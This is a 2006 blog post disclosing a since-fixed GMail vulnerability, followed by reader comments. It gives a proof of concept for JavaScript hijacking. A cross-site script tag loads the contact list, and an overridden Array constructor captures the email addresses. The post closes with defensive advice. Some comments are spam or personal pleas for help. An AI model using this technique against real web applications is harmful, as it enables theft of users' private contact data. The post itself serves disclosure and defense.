Friday, January 27, 2006

Advanced Web Attack Techniques using GMail


A few months ago, I discovered a vulnerability in GMail where it became trivial to compromise someone's email contact list. I demonstrated the issue to a friend at Google by emailing his GMail account with simple link. Upon clicking the link and viewing the page, no XSS required, your contacts were displayed on screen (see screenshot). From there the email addresses could be easily stolen. Imagine if a spammer stumbled across this!

The issue was fixed within a few days, but the reason this particular vulnerability was interesting is the exploit techniques are a bit different than normally discussed. Also, I've been seeing the scenario described below increasingly often in websites. Those interested in browser security and AJAX development should take note.


Attack Details
Assumes some knowledge of Cross-Site Request Forgeries, but with a slight variation.

1) Email a GMail account a link and click.
example: http://foo/index.html


2) HTML of http://foo/index.html
The single line of HTML below forces the web browser to automatically send an off-domain HTTP request to GMail. If the victim is logged-in(obviously the case when you email a GMail account), the session cookies will be sent along with the request, and the response contains the contact list. The URL was predictable across all users.

Page URL: http://foo/index.html

<*script src="http://mail.google.com/mail/?_url_scrubbed_">

3) Sample content of http://mail.google.com/mail/?_url_scrubbed

The JavaScript line below contains an unreferenced array constant with your contact list of email addresses.

[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ]

GMail normally sends an XmlHttpRequest (XHR) to get this data on the fly where its then eval'ed in the browser and assigned to a variable. However in our case, the constant is loaded into JavaScript space on (http://foo/index.html) using a script tag, so its never assigned to a variable. This means accessing the data requires something more.


4) Accessing the contact list

When JavaScript parses and interprets the unreferenced array the Array constructor is called. Its possible to overwrite the internal Array constructor with our own to access the contact list. The new Array constructor uses a setters to trigger events, then parses out the data we want, and prints the data to screen.

var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;

function Array() {
var obj = this;
var ind = 0;
var getNext;
getNext = function(x) {
obj[ind++] setter = getNext;

if(x) {
var str = x.toString();
if ((str != 'ct') &&amp;amp;amp;amp; (typeof x != 'object') && (str.match(/@/))) {
var row = table.insertRow(-1);
var td = row.insertCell(-1);
td.innerHTML = str;
}
}
};
this[ind++] setter = getNext;
}

function readGMail() {
document.body.appendChild(table);
}


Moral of the Story
  • Don't put sensitive data in pure JavaScript files. Wrap HTML tags around the data to protect it from script tags.
  • If JavaScript files must contain sensitive information, make the URL unpredictable. And/Or...
  • Make sure the file cannot be accessed by anything with an off-domain referer.

12 comments:

webmaster said...

Updated attack information here:
http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

Andreas Kwiatkowski said...

And now it has happened...

Anonymous said...

indeed. Reminds me a bit of BSE warners back in 1984, when no one would ever have thought that this disease would ever spread. But it's no breaking news isn't it? Try to close the door after the horse has left the barn...good luck.

jimbojw said...

> Make sure the file cannot be accessed by anything with an off-domain referer.

This is nice in theory, but it doesn't account for the null referrer case (which you really can't disable). If the attacker's goal is to harvest a lot of data, those who use proxies or have referrers disabled may be enough.

Blocking non-null off-site referrers is a nice thing to do, but is not a catchall solution.

Note: I'm sure you understand this, Jeremiah, this comment is mostly for your readers.

Jeremiah Grossman said...

jimbojw> Good point. My comment was before I learned more about forced browser referer spoofing. Amit Klein has found issues in both IE and Flash that allows a bad guy to alter a referer while performing a CSRF'ed request.

http://www.webappsec.org/lists/websecurity/archive/2005-09/msg00019.html
http://www.webappsec.org/lists/websecurity/archive/2006-07/msg00069.html

Referers continue to be things that are not to be trusted. I guess its still OK to use them as a backup security measure to make an attack harder, just don't rely on it.

Anonymous said...

Fortify has now published a general document addressing this class of vulnerability with some good suggestions for defense.

http://www.fortifysoftware.com/servlet/downloads/public/JavaScript_Hijacking.pdf

malak bokhari said...

Yesterday, my gmail account has been attacked. they changed the password since I can't access the account. also when i try to reset the password, i never get the email to do so into my secondary email account. any thoughts on how to proceed. I emailed google the problem but i don't think they understand. is there a way you can tell your google friend . thanks

Phil T said...

A new twist. My gmail account was open and a spam email was sent to all my contacts with the text below with a bunch of links to electronic junk for sale. All of my contacts were then deleted. Someone is getting through GMail security.

------------------------------------

Dear friend,
I would like to introduce a good company who trades mainly in electornic products.
Now the company is under sales promotion,all the products are sold nearly at its cost.
They provide the best service to customers,they provide you with original products of good quality,and what is more,the price is a surprising happiness to you!
It is realy a good chance for shopping.just grasp the opportunity,Now or never!
The web address: www.lrq0710.com

Anonymous said...

Hello,
I'm German national and a gmail user... - without technical knowledge

I urgently need help with a similiar problem. CONTACT DATA IS ACCESSED in my gmail account.

I always clear my folder "temporary internet files". By chance I realised 2 days ago that there was a cookie of which the mail id of an acquaintance was part of. This was an email id which I myself haven't used for 3 years.

It was clear for me that my account is spyed out. I observed the cookies after each log-in and it happened with 5 other addresses now: all of them were part of a cookie. None of the addresses (part of a contact list with 300 mail ids) I myself have used since years!

There is also an authentication cookie which looks like a program file and which was never there before during all the years I used gmail.

Furthermore there are cookies with question marks and squares.

Please help me!!! I don't know what to do.

This is another mail address of mine:
online_too_often@hotmail.com

Silver MLM said...

What are Richie McCaw's ball retention and attack techniques and could you say he is an aggressive player?

cialis said...

I emailed google the problem but i don't think they understand. is there a way you can tell your google friend . thanks

Data Protection Australia said...

You should avoid using script or any type of attachment besides PDF. Many corporate mailboxes as well as virus filters block attachments that end in .exe, .avi, .swf, .zip, etc.